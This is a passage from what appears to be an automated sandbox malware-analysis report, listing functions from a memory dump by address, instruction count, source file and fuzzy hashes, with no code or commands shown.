                                                                                                                              • Instruction Fuzzy Hash: 27427F75E002199FEB25CF69CC45BADBBF5BF48301F188099E949EB242D7389A85CF50
                                                                                                                              Function 019F2840 Relevance: .6, Instructions: 605COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6c7e00fbe715353f870dcbccfe9dc25283ec415df3f8c15d4f490cbc1cb02fc4
                                                                                                                              • Instruction ID: c712f55841837e668c9cea9245978a7be1c08bdd00e2331d761ae97a665d5b2f
                                                                                                                              • Opcode Fuzzy Hash: 6c7e00fbe715353f870dcbccfe9dc25283ec415df3f8c15d4f490cbc1cb02fc4
                                                                                                                              • Instruction Fuzzy Hash: 3832FE74A007558BEB29CF69C944BBEBBF2BFC6300F24411DD58E9B285D735A846CB90
                                                                                                                              Function 01A8A118 Relevance: .6, Instructions: 591COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 697365dd014c1ddd5dbe802f463faf57eb0c0798e5b446aa5db57b4aad1e0ef8
                                                                                                                              • Instruction ID: 5bbce8c0c2623d2ed1f970f77804ceb087e15a9aaa6aa3f1957191763ef35709
                                                                                                                              • Opcode Fuzzy Hash: 697365dd014c1ddd5dbe802f463faf57eb0c0798e5b446aa5db57b4aad1e0ef8
                                                                                                                              • Instruction Fuzzy Hash: 3D22BF742046618BEB25EF2DC094772BBF1AF44304F08845BEA97CF286E775E492DB60
                                                                                                                              Function 019E6A50 Relevance: .5, Instructions: 548COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 631a6aa9568812a2e29633e8538270fd0f5151aa39a2faf53f2e791352c1194e
                                                                                                                              • Instruction ID: 78137e66517edf6c427f7ae9046e6c31a27cd4b5ee20d5745a2dcb204d8efa46
                                                                                                                              • Opcode Fuzzy Hash: 631a6aa9568812a2e29633e8538270fd0f5151aa39a2faf53f2e791352c1194e
                                                                                                                              • Instruction Fuzzy Hash: A932A071A04205CFDB26CF68C584BAABBF5FF98310F144969E95AAB392D734F841CB50
                                                                                                                              Function 01A04A35 Relevance: .4, Instructions: 423COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                              • Instruction ID: 6e489795fb7e5fb4d4d9e0652139778e4009606e53a8e03584a6eaf20dd19367
                                                                                                                              • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                              • Instruction Fuzzy Hash: D3F13171E0061A9FDF16CF99E590BAEBBF5BF48710F098129EA05AB381D774D841CB60
                                                                                                                              Function 01A7892B Relevance: .4, Instructions: 386COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0dae52124b78a384156631f9f5f84198fcf81e5a97f2041aa54e1f21fc934baa
                                                                                                                              • Instruction ID: 4f000f4f8c706889d476a1b537ee5ee48969c3ac1ffce57bb600a1bc5a3dd2c8
                                                                                                                              • Opcode Fuzzy Hash: 0dae52124b78a384156631f9f5f84198fcf81e5a97f2041aa54e1f21fc934baa
                                                                                                                              • Instruction Fuzzy Hash: 5CD1FE71E0060A9BDF05CF69CC45ABEBBF1AF88304F198169D955E7241E73DEA05CB60
                                                                                                                              Function 019E65D0 Relevance: .4, Instructions: 383COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d644f2eb7bf86fa2ecf596b20597a56a64b8af8855df6dc4fe1a3cd0e7bc9c73
                                                                                                                              • Instruction ID: 253e7ceca80dbbf5723c220c3a4aa9b868b705926be5dbf08949a5a6f6bcd355
                                                                                                                              • Opcode Fuzzy Hash: d644f2eb7bf86fa2ecf596b20597a56a64b8af8855df6dc4fe1a3cd0e7bc9c73
                                                                                                                              • Instruction Fuzzy Hash: 58E19C71608342CFC716CF2CC494A6ABBE4FF99314F058A6DE99987351EB31E905CB92
                                                                                                                              Function 019D8397 Relevance: .4, Instructions: 380COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 448dd7b6e8efb9e4e15eeecc6600e1940c5c22c3bcc00e39661711ac7fc342f0
                                                                                                                              • Instruction ID: 103075e668d6e13b70892ba616f7fc58b77852d54bcfcff415d2374e70f01fe6
                                                                                                                              • Opcode Fuzzy Hash: 448dd7b6e8efb9e4e15eeecc6600e1940c5c22c3bcc00e39661711ac7fc342f0
                                                                                                                              • Instruction Fuzzy Hash: A9D1E271A002069BDB14DF68C881FBAB7B5FF94714F05862DF91ADB282E734D951CB60
                                                                                                                              Function 01A68243 Relevance: .3, Instructions: 322COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                              • Instruction ID: 558fb0416c518376d14419b7c16b1fbb06b94c1fea8bfa84c9d52c63b60d2a4d
                                                                                                                              • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                              • Instruction Fuzzy Hash: D0B16F74A00709AFDF24DFA9C940AABBBBDFF84304F14446DAA5297795DA38E905CB10
                                                                                                                              Function 019F0535 Relevance: .3, Instructions: 300COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                              • Instruction ID: 90b25d206524194a849f0cc4aa5fe54ffe21494be4775216ae338d5862d84c07
                                                                                                                              • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                              • Instruction Fuzzy Hash: E4B11731600646AFDB21DB68C854BBEBBFBAFC8300F184599E656D7282D730ED41CB90
                                                                                                                              Function 019E83C0 Relevance: .3, Instructions: 281COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7fe9fd3c770303e54ccc6540c32e9781f6aa4baeb5f627c46e10df0840b09da3
                                                                                                                              • Instruction ID: 21f8b1cef04b8a082145253ad4c896ca26ec635e538a73236f3b47963a3ec237
                                                                                                                              • Opcode Fuzzy Hash: 7fe9fd3c770303e54ccc6540c32e9781f6aa4baeb5f627c46e10df0840b09da3
                                                                                                                              • Instruction Fuzzy Hash: D8C158742083418FE765CF19C484BABB7E8FF88704F44496DE98987291EB74E948CF92
                                                                                                                              Function 019DC427 Relevance: .3, Instructions: 280COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a3476c9aefe177a35a58a79e52f72dffb90070b086d1651d0cbe54ade36be00f
                                                                                                                              • Instruction ID: 30808c129744701726177ad6d22bd97c8102a94e3f992293f1655f27fdb1a74c
                                                                                                                              • Opcode Fuzzy Hash: a3476c9aefe177a35a58a79e52f72dffb90070b086d1651d0cbe54ade36be00f
                                                                                                                              • Instruction Fuzzy Hash: F7B17F70A042668BDB25CF68C990BA9B3B5EF84710F44C5EDD54EE7281EB309D86CF20
                                                                                                                              Function 01A0E5E7 Relevance: .3, Instructions: 278COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: bd2f23a6d3ce4ef360646886758e14045c316476f89102f3df8355277ee71aa2
                                                                                                                              • Instruction ID: 33896f77932e1ad54418810aa64c4c72a39528b9d3adacc7df0287c5ff7b5d4d
                                                                                                                              • Opcode Fuzzy Hash: bd2f23a6d3ce4ef360646886758e14045c316476f89102f3df8355277ee71aa2
                                                                                                                              • Instruction Fuzzy Hash: B2A13531E00619AFEB22DBACE944FAEBBB4EF41714F090525EA01AB2D1D7749D41CBD1
                                                                                                                              Function 01A20185 Relevance: .3, Instructions: 276COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2a6cf233be6e99d4981159d7651d60a1d054fe21fba2c4a78148063786fbd810
                                                                                                                              • Instruction ID: 90cd06ffb3116cde82ae4fea11cd7be9daa134f34e75dfeeac1b656009a9fa7e
                                                                                                                              • Opcode Fuzzy Hash: 2a6cf233be6e99d4981159d7651d60a1d054fe21fba2c4a78148063786fbd810
                                                                                                                              • Instruction Fuzzy Hash: 15A1C170B01626DFDB25CF6DC690BAAB7B5FF54314F04412AFA059B682DB34E815CB50
                                                                                                                              Function 01AB4500 Relevance: .3, Instructions: 275COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 26baf12d08ff472ffc806050ddd0e46112df1bd384f2cf179d1f9cb592f12662
                                                                                                                              • Instruction ID: c3fe88464d2f48bb9e1c70460dc0a013c9b3ce9ac4971529ac195c56859b05b0
                                                                                                                              • Opcode Fuzzy Hash: 26baf12d08ff472ffc806050ddd0e46112df1bd384f2cf179d1f9cb592f12662
                                                                                                                              • Instruction Fuzzy Hash: 3FA1D172A04692EFD712DF58C980B9ABBE9FF48704F05052CE54A9B652D334ED41CB91
                                                                                                                              Function 01A660E0 Relevance: .3, Instructions: 264COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 99ab13922a360efb928dd275dcdeb56f2b2a501524759571d4a0d9891722f81f
                                                                                                                              • Instruction ID: 7a2c952fc162462e01cd701d8b3a5ee92884c2c26b5dfcf49492f4c2866e8a7c
                                                                                                                              • Opcode Fuzzy Hash: 99ab13922a360efb928dd275dcdeb56f2b2a501524759571d4a0d9891722f81f
                                                                                                                              • Instruction Fuzzy Hash: C6918171D00216AFDB15CFA9D894BAEBFB9AF48710F154169E618EB341D734EA009BA0
                                                                                                                              Function 019FE3F0 Relevance: .3, Instructions: 261COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: cc4c14f93f09d4f04a6e8f714f09d369c40da6a2c8bda9f0df398149e6788fed
                                                                                                                              • Instruction ID: 7bbac6b0b99520bb143d57ac0dd2d9019e54c12dcfa62fb2d82b3fcb72c08d28
                                                                                                                              • Opcode Fuzzy Hash: cc4c14f93f09d4f04a6e8f714f09d369c40da6a2c8bda9f0df398149e6788fed
                                                                                                                              • Instruction Fuzzy Hash: 50913535A00616EBEB25DB5CC484B7EBBA1EF88B14F06446DEB09DB3A1E634D901C751
                                                                                                                              Function 01A36ACC Relevance: .2, Instructions: 226COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 00e408b709f5ce90f503b9a64d09518ebfee1868424abc638fec2dd954489e0d
                                                                                                                              • Instruction ID: 8765ee913356950fa2b91dabd9fbfa739e852bbd1c6cf3a9e380f7c06ff9379d
                                                                                                                              • Opcode Fuzzy Hash: 00e408b709f5ce90f503b9a64d09518ebfee1868424abc638fec2dd954489e0d
                                                                                                                              • Instruction Fuzzy Hash: 7A819271E00616ABDB18CF69D940BBEBBF9FB88710F04852EE559D7640E334DA40CBA4
                                                                                                                              Function 01AAAB40 Relevance: .2, Instructions: 222COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                              • Instruction ID: 306bcc70fffa6eb489704d6cc1f16d55a7e690f4ea34dba93ac41761bb12d772
                                                                                                                              • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                              • Instruction Fuzzy Hash: E8817E71A0020A9FDF19CF99C990ABEBBF2BF84310F588569D9169B345D734EA05CB90
                                                                                                                              Function 01A1E284 Relevance: .2, Instructions: 212COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a1c25ceb78dd94c5e053329f164f34774aed94c862a7ae5bf500dedf16c6c69e
                                                                                                                              • Instruction ID: 6518dd9a3069e67ea0cd791af03654d22daa62dcf9cff5e2f7c95daf269b65f4
                                                                                                                              • Opcode Fuzzy Hash: a1c25ceb78dd94c5e053329f164f34774aed94c862a7ae5bf500dedf16c6c69e
                                                                                                                              • Instruction Fuzzy Hash: 5D816071A00609EFDB26CFA9C980BEEBBF9FF48354F144429E956A7254D730AC45CB60
                                                                                                                              Function 019FC640 Relevance: .2, Instructions: 206COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: bbb622eeb376b45a4a114ba8ce062da66f880f32fb3c6135b75f2905084dcb68
                                                                                                                              • Instruction ID: 60816c6970d48feffdd08a1707355585e0ded747caca36ca7412fe153fd209e6
                                                                                                                              • Opcode Fuzzy Hash: bbb622eeb376b45a4a114ba8ce062da66f880f32fb3c6135b75f2905084dcb68
                                                                                                                              • Instruction Fuzzy Hash: 8671F375D06629EBCB25CF98D490BBEBBB4FF88710F14851EE996AB350D3349805CB90
                                                                                                                              Function 01A947A0 Relevance: .2, Instructions: 202COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 5116704ac2a659270666230da9c7de45ab0354c8a7249704092a1649ec853801
                                                                                                                              • Instruction ID: 5207cc7f97985a44cbb50327db6ff1db159c69d5f060b53762c129c78c39a8aa
                                                                                                                              • Opcode Fuzzy Hash: 5116704ac2a659270666230da9c7de45ab0354c8a7249704092a1649ec853801
                                                                                                                              • Instruction Fuzzy Hash: C471C4B4901605EFDF20CF59DB44A9EBBF8FF88300F14815AE619EB258C7358986CB54
                                                                                                                              Function 019F260B Relevance: .2, Instructions: 201COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5feff32ac657496af62a574704861bcd5643f7483be77ee2510b6e27aced4e1c
                                                                                                                              • Instruction ID: cbd1291257aef359aa492547d899b26603d30942529534c5eeb22fbc860cdaf4
                                                                                                                              • Opcode Fuzzy Hash: 5feff32ac657496af62a574704861bcd5643f7483be77ee2510b6e27aced4e1c
                                                                                                                              • Instruction Fuzzy Hash: 4771C135604642AFD712DF28C484B2AB7E5FF89310F0485AEE999CB352DB38ED45CB91
                                                                                                                              Function 01A6035C Relevance: .2, Instructions: 198COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                              • Instruction ID: a2f544de0a2e81c0b71b1e4df56520f395785d3b15f3427bd8f6a1c80dcca30c
                                                                                                                              • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                              • Instruction Fuzzy Hash: BC716E71E0061AEFDB10DFA9CA44E9EBBB8FF88710F114569E505E7290DB34EA41CB50
                                                                                                                              Function 01A762A0 Relevance: .2, Instructions: 198COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 977a78451b2b1ebb9be5aa1ec74aa6bf368389ead722fc9ab734520120e44325
                                                                                                                              • Instruction ID: efdcca94e09bec4eeafd05dc20290f2b7bf6e0eeeaa02ccd1edaa2102fc4e51c
                                                                                                                              • Opcode Fuzzy Hash: 977a78451b2b1ebb9be5aa1ec74aa6bf368389ead722fc9ab734520120e44325
                                                                                                                              • Instruction Fuzzy Hash: 8B71D332240B01AFFB32DF18CD54F66BBB6EF44720F154518E65A8B2A1D775EA44CB50
                                                                                                                              Function 019E8AA0 Relevance: .2, Instructions: 197COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 086b4cb28ff27789c9f6d13e1c4eed46aa4e2e06da5b806003aaf035bb4db58d
                                                                                                                              • Instruction ID: 5c9497018b6e15aa9c965137557503e74d54ad58e05bddd09aefc0e422373348
                                                                                                                              • Opcode Fuzzy Hash: 086b4cb28ff27789c9f6d13e1c4eed46aa4e2e06da5b806003aaf035bb4db58d
                                                                                                                              • Instruction Fuzzy Hash: 8981F172A05306CFDB25CF98E488BAD77F6BF88710F19416AE905AB291C7349D41CB90
                                                                                                                              Function 01A1CDB1 Relevance: .2, Instructions: 197COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 81af68408b96fb4592619c837882b6badf06842fec18e405e90d1e5bfe566f37
                                                                                                                              • Instruction ID: 8ca0f55fea37f339fb88aeb596fff30120b4241f66e7bf00a023f28ac88aecd6
                                                                                                                              • Opcode Fuzzy Hash: 81af68408b96fb4592619c837882b6badf06842fec18e405e90d1e5bfe566f37
                                                                                                                              • Instruction Fuzzy Hash: EB61EFB1A00206DFDB19DFA8C980BAEB7B5FF48324F154169EA16EB295DB34D901CF50
                                                                                                                              Function 01A9A250 Relevance: .2, Instructions: 184COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6e043054074f20dfb83f755d7abbf2c1ab76492f5e828cd36a698a1a09b5b0f7
                                                                                                                              • Instruction ID: 19563d80b90c7fc39ca30ed02c5c368caf9cb655450a2fa8d4c36065cac18616
                                                                                                                              • Opcode Fuzzy Hash: 6e043054074f20dfb83f755d7abbf2c1ab76492f5e828cd36a698a1a09b5b0f7
                                                                                                                              • Instruction Fuzzy Hash: B151D172508712AFDB11DE68C884E6BBBE8EBC9750F01092AFA41DB150D770ED44CBA2
                                                                                                                              Function 01AA8DAE Relevance: .2, Instructions: 162COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 285a97d9e40d32bf0168e97f41160de0d64b84408ddfbc2e674f937ef85d1d52
                                                                                                                              • Instruction ID: 0558ad3aa2220e315bdda374efa5320fa325bdce1d66f0ce1895e9b7ed8ab9c9
                                                                                                                              • Opcode Fuzzy Hash: 285a97d9e40d32bf0168e97f41160de0d64b84408ddfbc2e674f937ef85d1d52
                                                                                                                              • Instruction Fuzzy Hash: DD51E4B26047029FD721DF28C840BABB7E5FF84351F44892CFA8597290D738E908CB95
                                                                                                                              Function 01A88350 Relevance: .2, Instructions: 161COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
